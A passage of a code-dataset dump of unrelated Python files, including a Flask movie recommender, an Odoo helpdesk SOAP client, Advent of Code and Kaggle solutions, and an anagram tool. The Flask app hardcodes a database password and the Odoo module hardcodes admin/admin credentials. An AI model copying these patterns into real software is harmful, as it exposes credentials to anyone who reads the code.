-3\nW[0][3] = -2\nW[3][4] = 3\n\nW = W + W.T\nminus_energy = np.zeros((len(V), 1))\nnodes_nums = [x for x in range(n)]\nrandom.shuffle(nodes_nums)\nprint(nodes_nums)\nE=[]\nfor S in V:\n E1 = 0\n x = np.array(S)\n for num in nodes_nums:\n E1 = -1 * (np.dot(np.dot(x, W), x.T) / 2)\n x2 = x\n E2 = -1 * (np.dot(np.dot(x2, W), x2.T) / 2)\n if x2[num] == 0:\n x2[num] = 1\n else:\n x2[num] = 0\n if E2 < E1:\n x = x2\n E.append(E2)\n else:\n E.append(E1)\nres = list(set(E))\nres.sort()\nprint(res)\n","sub_path":"hopfield_assighment.py","file_name":"hopfield_assighment.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"117851105","text":"# https://adventofcode.com/2020/day/8\n\nfrom enum import Enum\n\nimport pytest\n\n\nclass Op(Enum):\n acc = 1\n jmp = 2\n nop = 3\n\ndef read_program(fname):\n program = []\n with open(fname) as f:\n for line in f:\n op, num = line.split()\n program.append((Op.__members__[op], int(num)))\n return program\n\nclass Cpu:\n def __init__(self, program, tweaks=None):\n self.program = program\n self.tweaks = tweaks or {}\n self.ip = 0\n self.acc = 0\n self.ips_executed = set()\n\n def step(self):\n op, num = self.tweaks.get(self.ip, self.program[self.ip])\n self.ips_executed.add(self.ip)\n if op == Op.acc:\n self.acc += num\n elif op == Op.jmp:\n self.ip += num - 1\n elif op == Op.nop:\n pass\n self.ip += 1\n\n def about_to_repeat(self):\n return self.ip in self.ips_executed\n\n def part1(self):\n while not self.about_to_repeat():\n self.step()\n return self.acc\n\n def done(self):\n return self.ip == len(self.program)\n\n def part2(self):\n while True:\n if self.about_to_repeat():\n return None\n if self.done():\n return self.acc\n self.step()\n\n\ndef test_part1():\n cpu = Cpu(read_program(\"day08_test.txt\"))\n assert cpu.part1() == 5\n\nif __name__ == \"__main__\":\n cpu = Cpu(read_program(\"day08_input.txt\"))\n acc = cpu.part1()\n print(f\"Part 1: Immediately before any instruction is executed a second time, {acc} is in the accumulator.\")\n\ndef part2(fname):\n program = read_program(fname)\n for i, (op, num) in enumerate(program):\n if op == Op.jmp:\n tweaks = {i: (Op.nop, num)}\n elif op == Op.nop:\n tweaks = {i: (Op.jmp, num)}\n elif op == Op.acc:\n continue\n cpu = Cpu(program, tweaks)\n acc = cpu.part2()\n if acc is not None:\n return acc\n\ndef test_part2():\n assert part2(\"day08_test.txt\") == 8\n\nif __name__ == \"__main__\":\n acc = part2(\"day08_input.txt\")\n print(f\"Part 2: {acc} is in the accumulator.\")\n","sub_path":"day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"400735106","text":"import os\nimport re\nfrom sys import argv\n\n#-----------------------------------------------------------\nhipfile = argv[1]\nout_node = argv[2]\nfirst_frame = int(argv[3])\nlast_frame = int(argv[4])\n#-----------------------------------------------------------\n\n#-----------------------------------------------------------\nhou.hipFile.load(hipfile)\n#----------------------------------------------------\n\nif str(hou.node(out_node).type())==\"<hou.NodeType for Driver arnold>\":dopType=False\nelse:dopType=True\n\nif dopType:\n\n\t# obtiene la ruta del dop network\n\trop_output = hou.node(out_node)\n\tfor node in rop_output.parent().children():\n\t\ttry:\n\t\t\tdop_path = node.evalParm(\"doppath\")\n\t\t\tbreak\n\t\texcept:None\n\t#-----------------------------------------\n\n\tnode_output = rop_output.evalParm(\"sopoutput\")\n\n\tdirname=os.path.dirname(node_output)\n\tbasename_full=os.path.basename(node_output)\n\tpadding=re.findall('\\d+', basename_full)[-1]\n\tbasename=basename_full.split(padding)[0]\n\n\tini=dirname+\"/initialstate\"\n\tif not os.path.isdir(ini):\n\t\tos.mkdir(ini)\n\t\n\t# chekea si el .sim anterior existe\n\tinit_frame=ini+\"/\"+basename+str(first_frame-1)+\".sim\"\n\tif not os.path.isfile(init_frame):\n\t\tinit_frame=None\n\t#-----------------------------------------\n\tif not first_frame==1:\n\t\thou.node(dop_path).parm(\"startframe\").set(first_frame-1)\n\tif init_frame:\n\t\thou.node(dop_path).parm(\"initialstate\").set(init_frame)\n\n\tif init_frame or first_frame==1:\n\n\t\trop_output.render(frame_range=(first_frame,last_frame), verbose=True)\n\n\t\tdop_output = hou.node('/out').createNode('dop')\n\t\tdop_output.parm(\"doppath\").set(dop_path)\n\t\tsim_file=ini+\"/\"+basename+str(last_frame)+\".sim\"\n\t\tdop_output.parm(\"dopoutput\").set(sim_file)\n\n\t\tdop_output.render(frame_range=(last_frame,last_frame), verbose=False)\n\n\telse:print(\"\\nNo simulation starting point was found.\\n\")\n\nelse:\n\thou.node(out_node).render(frame_range=(first_frame,last_frame), verbose=True)\n\n","sub_path":"modules/houdiniCatsFarm.py","file_name":"houdiniCatsFarm.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"208213300","text":"from flask import Flask, request, render_template, jsonify\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport pymysql\n\napp = Flask(__name__)\n\n\ndef movieExists(movie_name, df):\n if movie_name in df.index:\n return True\n else:\n return False\n\n\ndef find_similar_movie(movie_name, df):\n if movieExists(movie_name, df):\n a_1 = np.array(df.loc[movie_name]).reshape(1, -1)\n score_1 = cosine_similarity(df, a_1).reshape(-1)\n dictDf = {'content': score_1}\n similar = pd.DataFrame(dictDf, index=df.index)\n similar.sort_values('content', ascending=False, inplace=True)\n similar_list = similar.index.tolist()[1:11]\n return similar_list\n else:\n raise ValueError('ERROR: The Movie is not Recognised')\n\n\n@app.route('/contributors')\ndef get_contributors():\n return jsonify({\n \"Contributors\": [\n \"Linjing Fu\",\n \"Ekaterina Krivtsova\",\n \"Piotr Biskupski\",\n \"Thomas Irmer\"\n ]\n })\n\n\n@ app.route('/')\ndef my_form():\n return render_template(\"home.html\")\n\n\n@ app.route('/handleDataExistingUser', methods=['POST'])\ndef handleDataExistingUser():\n mydb = pymysql.connect(user='testuser', passwd='Password123!', host='mysql', database='sampledb')\n mycursor = mydb.cursor()\n\n firstname = request.form['firstnameval']\n lastname = request.form['lastnameval']\n\n fullname = firstname+' '+lastname\n fullname = fullname.title()\n\n modelval = \"1\"\n\n mycursor.execute(\"SELECT * FROM sampledb.movie_predictions WHERE name=%s\", (fullname,))\n\n myresult = mycursor.fetchall()\n\n res_name = 'no user exists by that name'\n if not myresult:\n res_name = 'no user exists by that name'\n\n print(\"We are using Model: \" + modelval)\n return render_template(\"home.html\", error_message=\"ERROR: User is not recognized\")\n else:\n res_name = fullname\n movies = myresult[0]\n print(\"We are using Model: \" + modelval)\n return render_template(\"results.html\", fullname=res_name,\n movie_rec_1=movies[2], movie_rec_2=movies[3], movie_rec_3=movies[4], movie_rec_4=movies[5], movie_rec_5=movies[6],\n movie_rec_6=movies[7], movie_rec_7=movies[8], movie_rec_8=movies[9], movie_rec_9=movies[10], movie_rec_10=movies[11])\n\n\n@ app.route('/handleDataNewUser', methods=['POST'])\ndef handleDataNewUser():\n res_name = 'ERROR'\n try:\n latent_matrix_1_mvp = pd.read_csv('app_csvs/movie-similarity-matrix.csv', index_col=0)\n\n firstname = request.form['firstnameval']\n lastname = request.form['lastnameval']\n movie = request.form['movieval']\n\n res_name = firstname+' '+lastname\n res_name = res_name.title()\n\n modelval = \"2\"\n\n movies = find_similar_movie(movie, latent_matrix_1_mvp)\n\n print(\"We are using Model: \" + modelval)\n return render_template(\"results.html\", fullname=res_name,\n movie_rec_1=movies[0], movie_rec_2=movies[1], movie_rec_3=movies[2], movie_rec_4=movies[3], movie_rec_5=movies[4],\n movie_rec_6=movies[5], movie_rec_7=movies[6], movie_rec_8=movies[7], movie_rec_9=movies[8], movie_rec_10=movies[9])\n\n except Exception as error:\n print(\"We are using Model: \"+modelval)\n print(str(error))\n return render_template(\"home.html\", error_message=str(error))\n\n\n@ app.route('/new/user', methods=['POST'])\ndef newuser():\n try:\n mydb = pymysql.connect(user='testuser', passwd='Password123!', host='mysql', database='sampledb')\n mycursor = mydb.cursor()\n\n sql = \"INSERT INTO movie_predictions (name,userId,rec_1,rec_2,rec_3,rec_4,rec_5,rec_6,rec_7,rec_8,rec_9,rec_10,oldrank_1,oldrank_2,oldrank_3) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n\n args = (request.json['name'], request.json['userid'], request.json['movie_rec_1'], request.json['movie_rec_2'],\n request.json['movie_rec_3'], request.json['movie_rec_4'], request.json['movie_rec_5'],\n request.json['movie_rec_6'], request.json['movie_rec_7'], request.json['movie_rec_8'],\n request.json['movie_rec_9'], request.json['movie_rec_10'], request.json['old_movie_1'],\n request.json['old_movie_2'], request.json['old_movie_3'])\n\n mycursor.execute(sql, args)\n\n mydb.commit()\n\n return jsonify({'result': \"New user added successfully\"})\n\n except Exception as error:\n return jsonify({\"ERROR\": \"There was an error while adding new user\", \"ERROR MESSAGE\": str(error)})\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\")\n","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"223494007","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport logging\nimport base64\nfrom datetime import date, timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom requests.exceptions import ConnectionError as ReqConnectionError, HTTPError, InvalidSchema, InvalidURL, ReadTimeout\nfrom zeep.wsse.username import UsernameToken\nfrom zeep import Client, Settings\nfrom zeep.exceptions import Fault\nfrom zeep.transports import Transport\nfrom zeep import helpers\n\nfrom lxml import etree\nfrom lxml import objectify\n\nfrom bs4 import BeautifulSoup\n\nfrom odoo import models, fields, api, _\n\n_logger = logging.getLogger(__name__)\n\ncredentials = {\n 'fault_ns': 's',\n 'wsdl': 'https://www.porschecl.cl/usuarios/aestadoodoo.aspx?wsdl',\n 'token': UsernameToken('admin', 'admin'),\n}\n\n\nclass HelpdeskTicket(models.Model):\n _inherit = 'helpdesk.ticket'\n\n ticket_state_wsdl = fields.Selection(string='Estado Respuesta WSDL',\n selection=[('0', 'No enviado'), ('1', 'WSDL Respuesta 1'),\n ('2', 'WSDL Respuesta 2')],\n default='0')\n\n @api.model\n def _l10n_pe_edi_get_general_error_messages(self):\n return {\n 'L10NPE07': _(\n \"Trying to send the invoice to the UserCore the webservice returned a controlled error, please \"\n \"try again later, the error is on their side not here.\"),\n 'L10NPE08': _(\"Check your firewall parameters, it is not being possible to connect with server to sign \"\n \"invoices.\"),\n 'L10NPE10': _(\"The URL provided to connect to the UserCore is wrong, please check your implementation.\"),\n 'L10NPE11': _(\"The XML generated is not valid.\"),\n 'L10NPE12': _(\"The XML generated is not valid.\"),\n\n }\n\n def write(self, vals):\n res = super(HelpdeskTicket, self).write(vals)\n\n if 'stage_id' in vals:\n stages = [\n self.env.ref('helpdesk.stage_solved').id, self.env.ref('helpdesk.stage_cancelled').id\n ]\n\n if self.stage_id.id in stages:\n print(self.stage_id.name, 'Stage')\n\n last_message = self.message_ids.filtered(lambda r: r.message_type == 'comment')\n\n if not last_message:\n last_message = self.message_ids\n\n write_date = self.close_date + timedelta(hours=-4)\n\n data = {\n 'Sdtticketestado': {\n 'idTicket': self.id,\n 'idTicket_usercore': self.numticket_UserCore,\n 'Estado': self.stage_id.name,\n 'RespuestaTecnico': last_message[0].body,\n 'fecha': date.strftime(self.write_date, '%Y-%m-%d'),\n 'hora': '{}:{}:{}'.format(write_date.hour, write_date.minute, write_date.second),\n 'rut_usercore_tecnico': self.user_id.vat,\n 'RespCode': ''\n }\n }\n\n _logger.info(f\"POST WSDL Ticket State ===>>> {data}\")\n\n transport = Transport(operation_timeout=15, timeout=15)\n result = None\n\n try:\n settings = Settings(raw_response=True)\n client = Client(\n wsdl=credentials['wsdl'],\n wsse=credentials['token'],\n settings=settings,\n transport=transport,\n )\n result = client.service.Execute(**data)\n result.raise_for_status()\n\n except Exception as e:\n _logger.error(e)\n\n _logger.info(result)\n if not result:\n _logger.info(result.content)\n\n if result.status_code == 200:\n soap_xml = result.content\n resp_code = BeautifulSoup(soap_xml, 'xml').find('SOAP-ENV:Body').find('RespCode')\n _logger.info(f\"RespCode: {resp_code.contents[0]}\")\n self.ticket_state_wsdl = resp_code.contents[0]\n\n return res\n","sub_path":"helpdesk_wsrepticket/models/helpdesk_ticket.py","file_name":"helpdesk_ticket.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"219056667","text":"n1 = int(input(\"primeiro valor: \"))\r\nn2 = int(input(\"segundo valor: \"))\r\nn3 = int(input(\" terceiro valor: \"))\r\n\r\nMAIOR = n1\r\n\r\nif (n2 > MAIOR ):\r\n MAIOR = n2\r\n\r\nif (n3 > MAIOR ):\r\n MAIOR = n3\r\n\r\nprint (\"MAIOR: \", MAIOR)\r\n\r\nMENOR = n1\r\n\r\nif (n2 < MENOR ):\r\n MENOR = n2\r\n\r\nif (n3 < MENOR ):\r\n MENOR = n3\r\n\r\nprint (\"MENOR: \", MENOR)","sub_path":"ATV2-7.py","file_name":"ATV2-7.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"612401355","text":"\n# coding: utf-8\n\n# # PROJET KAGGLE DIGIT\n\n# Importation des pacakges nécessaires\n\n# In[1]:\n\nimport pandas as pd\nimport sklearn as sk\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nfrom sklearn import neighbors\nfrom sklearn import linear_model\nfrom sklearn.model_selection import train_test_split\n\n\n\n\n#%config InlineBackend.figure_formats = {'pdf',}\nget_ipython().magic('matplotlib inline')\n\n\n# On charge les données\n\n# In[4]:\n\ndata=pd.read_csv(\"/Users/philippinejamet/Desktop/Adrien/Kaggle_digit/train.csv\")\nprint('format données:', data.shape)\n\n\n# In[5]:\n\nX=data.iloc[:,1:]\ny=data.iloc[:,0]\n\n\n# In[10]:\n\nX_train, X_CV, y_train, y_CV = train_test_split(X, y, test_size=0.2, random_state=0)\nprint('taille des données:',X.shape, y.shape,'entrainement:', X_train.shape, y_train.shape,'cv:',X_CV.shape, y_CV.shape)\n\n\n# In[11]:\n\ntest=pd.read_csv(\"/Users/philippinejamet/Desktop/Adrien/Kaggle_digit/test.csv\")\nprint('taille des donnnes test', test.shape)\n\n\n# # Regression logistique\n\n# In[ ]:\n\nRegLogistique= sk.linear_model.LogisticRegression()\nRegLogistique.fit(X_train,y_train)\n\ny_predict_logit=RegLogistique.predict(test)\n\n\n \n\n\n# In[ ]:\n\nprint('score sur données entrainement', RegLogistique.score(X=X_train,y=y_train))\nprint('score sur les données de validation', RegLogistique.score(X=X_CV,y=y_CV))\n\n\n\n# # KNN\n\n# In[ ]:\n\n# On choisit notre paramètre k\n\ndata.shape\ndata.shape[0]\nsample = np.random.randint(data.shape[0], size=5000)\nsample\ndata_sample=data.iloc[sample,:]\n\n\nX_sample=data_sample.iloc[:,1:]\ny_sample=data_sample.iloc[:,0]\n\n\n# In[10]:\n\nX_sample_train, X_sample_CV, y_sample_train, y_sample_CV = train_test_split(X_sample, y_sample, test_size=0.2, random_state=0)\n\n\n\n\n\nerrors = []\nfor k in range(2,15):\n knn = neighbors.KNeighborsClassifier(k)\n errors.append(100*(1 - knn.fit(X_train, y_train).score(X_CV, y_CV)))\nplt.plot(range(2,15), errors, 'o-')\nplt.show()\n\n\n# On choisit k=7\n\n# In[ ]:\n\n#knn = neighbors.KNeighborsClassifier(6)\n#knn.fit(X_sample_train,y_sample_train)\n#knn.score(X_sample_train,y_sample_train)\n#knn.score(X_sample_CV,y_sample_CV)\n#y_predict_knn=knn.predict(test)\n\n\nknn = neighbors.KNeighborsClassifier(6)\nknn.fit(X,y)\n#knn.score(X_sample_train,y_sample_train)\n#knn.score(X_sample_CV,y_sample_CV)\n\ny_predict_knn=knn.predict(test)\n\n\n\n# # SUBMISSION\n\n# In[ ]:\n\nImageId=np.arange(1,28001)\nImageId=pd.DataFrame(ImageId)\nImageId.columns=[\"ImageId\"]\n\n\n#regression logistique\n\ny_predict_logit=pd.DataFrame(y_predict_logit)\ny_predict_logit.columns=[\"label\"]\nsubmission_logit=pd.concat([ImageId,y_predict_logit],axis=1)\npd.DataFrame.to_csv(submission_logit,\"/Users/philippinejamet/Desktop/Adrien/Kaggle_digit/submission_logit.csv\",sep=',',index=0)\n\n#KNN\n\ny_predict_knn=pd.DataFrame(y_predict_knn)\ny_predict_knn.columns=[\"label\"]\nsubmission_knn=pd.concat([ImageId,y_predict_knn],axis=1)\npd.DataFrame.to_csv(submission_knn,\"/Users/philippinejamet/Desktop/Adrien/Kaggle_digit/submission_knn6.csv\",sep=',',index=0)\n\n\n\n","sub_path":"Kaggle_digit.py","file_name":"Kaggle_digit.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"333442514","text":"# https://programmers.co.kr/learn/courses/30/lessons/42584?language=python3\ndef solution(prices):\n n = len(prices)\n answer = [1] * (n - 1) + [0]\n for i in range(n - 1):\n j = i\n while j < n - 1:\n j += 1\n if prices[i] > prices[j]:\n break\n answer[i] = j - i\n return answer\n","sub_path":"programmers/laern/stack&queue6.py","file_name":"stack&queue6.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"525234661","text":"import sys\nfrom math import log, ceil\nread=lambda:sys.stdin.readline().rstrip()\nreadi=lambda:int(sys.stdin.readline())\nwriteln=lambda x:sys.stdout.write(str(x)+\"\\n\")\nwrite=lambda x:sys.stdout.write(x)\nlog2=lambda x:log(x, 2)\niceil=lambda x:int(ceil(x))\ndef init(arr, tree, node, start, end, op=lambda x,y: x+y):\n if start == end:\n tree[node] = arr[start]\n return tree[node]\n else:\n mid = (start + end) >> 1\n _a = init(arr, tree, node*2, start, mid, op)\n _b = init(arr, tree, node*2+1, mid+1, end, op)\n tree[node] = op(_a, _b)\n return tree[node]\n\ndef segOp(tree, node, start, end, left, right, iv=0, op=lambda x,y:x+y):\n if left > end or right < start:\n return iv \n if left <= start and end <= right:\n return tree[node]\n mid = (start + end) >> 1\n _a = segOp(tree, node*2, start, mid, left, right, iv, op)\n _b = segOp(tree, node*2 + 1, mid + 1, end, left, right, iv, op)\n return op(_a, _b)\n\nN,M=map(int, read().split())\na=[0]*N\nh=iceil(log2(N))\ntsize = 1 << (h+1)\ntree = [0]*tsize\nfor i in range(N):\n a[i] = readi()\ninit(a, tree, 1, 0, N-1, lambda x, y: x if x <= y else y)\nwhile M:\n t1,t2=map(int, read().split())\n writeln(segOp(tree, 1, 0, N-1, t1-1, t2-1, iv=1e300, op=lambda x, y: x if x < y else y))\n M -= 1","sub_path":"segment_tree/segment_min_10868.py","file_name":"segment_min_10868.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"273229793","text":"#!/usr/bin/env python3\n\nfrom nwg_panel.tools import check_key\nimport gi\n\ngi.require_version('Gtk', '3.0')\ngi.require_version('Gdk', '3.0')\n\nfrom gi.repository import Gtk\n\n\nclass DwlTags(Gtk.EventBox):\n def __init__(self, output, settings):\n Gtk.EventBox.__init__(self)\n check_key(settings, \"tag-names\", \"1 2 3 4 5 6 7 8 9\")\n check_key(settings, \"title-limit\", 55)\n check_key(self.settings, \"angle\", 0.0)\n\n self.output = output\n self.settings = settings\n\n names = self.settings[\"tag-names\"].split()\n self.tags = names if len(names) == 9 else [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n\n self.byte_dict = {1: 1, 2: 2, 3: 4, 4: 8, 5: 16, 6: 32, 7: 64, 8: 128, 9: 256}\n\n self.box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)\n if self.settings[\"angle\"] != 0.0:\n self.box.set_orientation(Gtk.Orientation.VERTICAL)\n self.add(self.box)\n self.label = Gtk.Label()\n if self.settings[\"angle\"] != 0.0:\n self.label.set_angle(self.settings[\"angle\"])\n self.tag_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)\n if self.settings[\"angle\"] != 0.0:\n self.tag_box.set_orientation(Gtk.Orientation.VERTICAL)\n self.box.pack_end(self.label, False, False, 4)\n self.show_all()\n\n def refresh(self, dwl_data):\n if dwl_data:\n try:\n data = dwl_data[self.output]\n tags_string = data[\"tags\"]\n tags = tags_string.split()\n non_empty_output_tags = int(tags[0])\n selected_output_tag = int(tags[1])\n current_win_on_output_tags = int(tags[2])\n urgent_tags = int(tags[3])\n\n if self.tag_box:\n self.tag_box.destroy()\n self.tag_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)\n if self.settings[\"angle\"] != 0.0:\n self.tag_box.set_orientation(Gtk.Orientation.VERTICAL)\n self.tag_box.set_property('name', 'dwl-tag-box')\n self.box.pack_start(self.tag_box, False, False, 4)\n\n cnt = 1\n win_on_tags = []\n for item in self.tags:\n tag_wrapper = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)\n if self.settings[\"angle\"] != 0.0:\n tag_wrapper.set_orientation(Gtk.Orientation.VERTICAL)\n label = Gtk.Label()\n if self.settings[\"angle\"] != 0.0:\n label.set_angle(self.settings[\"angle\"])\n tag_wrapper.pack_start(label, False, False, 0)\n if self.byte_dict[cnt] == selected_output_tag:\n tag_wrapper.set_property('name', \"dwl-tag-selected\")\n self.tag_box.pack_start(tag_wrapper, False, False, 1)\n label.set_text(item)\n\n if self.byte_dict[cnt] & non_empty_output_tags != 0:\n label.set_property('name', \"dwl-tag-occupied\")\n else:\n label.set_property('name', \"dwl-tag-free\")\n\n if self.byte_dict[cnt] & urgent_tags != 0:\n label.set_property('name', \"dwl-tag-urgent\")\n\n if self.byte_dict[cnt] & current_win_on_output_tags != 0:\n win_on_tags.append(str(cnt))\n\n cnt += 1\n self.tag_box.show_all()\n\n layout = data[\"layout\"]\n\n title = data[\"title\"]\n if len(title) > self.settings[\"title-limit\"]:\n title = title[:self.settings[\"title-limit\"] - 1]\n\n # title suffix to add if win present on more than 1 tag\n s = \", \".join(win_on_tags) if len(win_on_tags) > 1 else \"\"\n if s:\n title = \"{} ({})\".format(title, s)\n\n # selmon = data[\"selmon\"] == \"1\"\n # print(\"{} {} {}\".format(tags_string, layout, title))\n self.label.set_text(\"{} {}\".format(layout, title))\n except KeyError:\n print(\"No data found for output {}\".format(self.output))\n","sub_path":"nwg_panel/modules/dwl_tags.py","file_name":"dwl_tags.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"345643964","text":"'''\nCreated on 16-Jan-2016\n\n@author: harun\n'''\nimport re\nimport operator\nimport time\nimport nltk\nfrom itertools import permutations\nfrom nltk.corpus import words\nfrom nltk.corpus import wordnet\nfrom __builtin__ import file\nfrom numpy.core.fromnumeric import put\nfrom curses.ascii import isalnum\nfrom collections import OrderedDict\n\ntokenFile=\"test.tokens\" # the name of the file you wish to process\nanagramsFile=\"anagrams.anagrams\"\nnltkAnagramsFile=\"nltkAnagrams.anagrams\"\nenglishWordFile=\"/usr/share/dict/words\"\nenglishWords=set()\nmaxLength=25 # the longest word in NLTK library is of length 24\nhashMap=dict()\nnltkHashMap=dict()\nanagrams=dict()\n\ndef loadNLTKAnagrams():\n print(\"Loading Anagrams...\")\n stime=time.time()\n file=open(nltkAnagramsFile,\"r\")\n for line in file:\n words=re.split('[^a-zA-Z0-9]',line)\n n=len(words)\n key=words[0]\n l=set()\n for i in xrange(3,n):\n if words[i]!='set' and words[i]!='' and words[i]!='u':\n l.add(words[i])\n anagrams[key]=filter(None,l)\n file.close()\n print(\"Anagrams loaded: %d\"%len(anagrams))\n print(\"Time taken to load anagrams: %s\"%(time.time()-stime))\n \ndef precomputeFromNLTK():\n '''\n precompute with nltk's corpus as wordbase\n '''\n language=set()\n print(len(words.words()))\n for word in words.words():\n word=word.lower()\n sortW=''.join(char for char in sorted(word))\n if sortW[0]>='a' and sortW[0]<='z':\n word=word+\":\"+sortW\n language.add(word)\n print(\"Loaded %d words from NLTK wordnet\"%(len(language)))\n buckets=[set() for x in xrange(25)]\n for word in language:\n buckets[len(word)/2].add(word)\n count=0\n for word in language:\n if count%1000==0:\n print(\"Done for %d words\"%count)\n count+=1\n sortedW=word.split(\":\")[1]\n if sortedW not in nltkHashMap:\n nltkHashMap[sortedW]=set()\n for word2 in buckets[len(sortedW)]:\n sortedW2=word2.split(\":\")[1]\n if(sortedW==sortedW2):\n nltkHashMap[sortedW].add(word2.split(\":\")[0])\n file=open(nltkAnagramsFile,\"w\")\n file.truncate()\n count=0\n for anagrams, listOfAnagrams in nltkHashMap.items():\n if count%1000==0:\n print(\"%d anagram lists written\"%count)\n file.flush()\n count+=1\n file.write(\"%s:%s\\n\"%(anagrams, listOfAnagrams))\n file.close()\n print(\"Precomputation with NLTK done\")\n\ndef precompute():\n '''\n precomputes anagrams with /usr/share/dict/words as wordbase\n '''\n starttime=time.time()\n file=open(englishWordFile, \"r\")\n # load all english words\n for line in file:\n line=line[:-1]\n line=line.lower()\n sortL=''.join(char for char in sorted(line))\n put=line+\":\"+sortL\n englishWords.add(put)\n print(\"Loaded words %d\"%len(englishWords))\n buckets=[set() for x in xrange(25)]\n for word in englishWords:\n buckets[len(word)/2].add(word)\n for i in xrange(maxLength):\n print(\"%d: %d\"%(i, len(buckets[i])))\n count=0\n for word in englishWords:\n if count%1000==0:\n print(\"Done for %d words\"%count)\n print(\"Took %s seconds\"%(time.time()-starttime))\n count+=1\n sortedWord = word.split(\":\")[1]\n if not isalnum(sortedWord[0]):\n continue\n if sortedWord not in hashMap:\n hashMap[sortedWord]=set()\n for word2 in buckets[len(sortedWord)]:\n sortedWord2=word2.split(\":\")[1]\n if sortedWord==sortedWord2:\n hashMap[sortedWord].add(word2.split(\":\")[0])\n anag=open(anagramsFile, \"w\")\n anag.truncate()\n count=0\n for anagram,listOfAnagrams in hashMap.items():\n if count%100==0:\n print(\"%d lists written\"%(count))\n anag.flush()\n count+=1\n anag.write(\"%s:%s\\n\"%(anagram,listOfAnagrams))\n anag.close()\n print(\"Precomputation done\")\n\ndef loadAnagrams():\n print(\"Loading Anagrams...\")\n stime=time.time()\n file=open(anagramsFile,\"r\")\n for line in file:\n words=re.split('[^a-zA-Z0-9]',line)\n n=len(words)\n key=words[0]\n l=set()\n for i in xrange(2,n):\n l.add(words[i])\n anagrams[key]=filter(None,l)\n file.close()\n print(\"Anagrams loaded: %d\"%len(anagrams))\n print(\"Time taken: %s\"%(time.time()-stime))\n\ndef detectAnagrams(tokens):\n '''\n input: list of tokens\n output: None\n return: Dict of <token, Set<anagram>> pairs\n '''\n tokens.sort()\n tokAnag=OrderedDict()\n for token in tokens:\n token=token.lower()\n tokenCopy=''.join(char for char in token)\n token=''.join(char for char in sorted(token))\n if tokenCopy in tokAnag:\n continue\n if token in anagrams:\n tokAnag[tokenCopy]=set(anagrams[token])\n else:\n tokAnag[tokenCopy]=set()\n return tokAnag\n\ndef printAnagrams(angs):\n print(\"The anagrams are:\")\n for key, val in angs.items():\n print(\"%s: %s\"%(key, val))\n\ndef computeThreeGramFrequencies(tokens):\n '''\n input: list of tokens\n output: None\n return: dictionary of <3grams, count> mappings\n '''\n n=len(tokens)\n threeGramFrequency=dict()\n for index in xrange(n-2):\n threeGram=tokens[index].lower()+\",\"+tokens[index+1].lower()+\",\"+tokens[index+2].lower()\n if threeGram in threeGramFrequency:\n threeGramFrequency[threeGram]+=1\n else:\n threeGramFrequency[threeGram]=1\n return threeGramFrequency\n \ndef printThreeGramFrequencies(frequencies):\n '''\n input: dictionary of <3grams, count> mappings\n output: prints the dictionary sorted on values\n returns: None\n '''\n sortedFreq = sorted(frequencies.items(), key=operator.itemgetter(1))\n for ngrams in reversed(sortedFreq):\n print(ngrams)\n \ndef countWordFrequencies(tokens):\n '''\n input: list of tokens\n output: None\n return: dictionary of <token, count> mappings\n '''\n frequencies=dict()\n for token in tokens:\n token=token.lower()\n if frequencies.has_key(token):\n frequencies[token]=frequencies[token]+1\n else:\n frequencies[token]=1\n return frequencies\n \ndef printWordFrequencies(frequencies):\n '''\n input: dictionary of <token, count> mappings\n output: prints the dictionary sorted on values\n return: None\n '''\n sortedFrequencies=sorted(frequencies.items(), key=operator.itemgetter(1))\n print(\"The word frequencies are:\")\n cnt=1\n for count in reversed(sortedFrequencies):\n print(count)\n cnt+=1\n if cnt > 10:\n break\n \ndef tokenizeFile():\n '''\n input: None\n output: None\n return: list of tokens\n '''\n tokens=[]\n file=open(tokenFile,'r')\n if not file:\n print(\"File not found\")\n else:\n print(\"File opened\")\n for line in file:\n words=re.split('[^a-zA-Z0-9]',line)\n words=filter(None, words)\n for w in words:\n tokens.append(w)\n return tokens\ndef printTokens(tokens):\n print(\"The tokens in the file are:\")\n for token in tokens:\n print(token)\n\nif __name__ == '__main__':\n starttime = time.time()\n# uncomment the next line in case you want to precompute\n# precompute()\n toks=tokenizeFile()\n# printTokens(toks)\n freq=countWordFrequencies(toks)\n printWordFrequencies(freq)\n# ngrams=computeThreeGramFrequencies(toks)\n# printThreeGramFrequencies(ngrams)\n# loadAnagrams()\n# 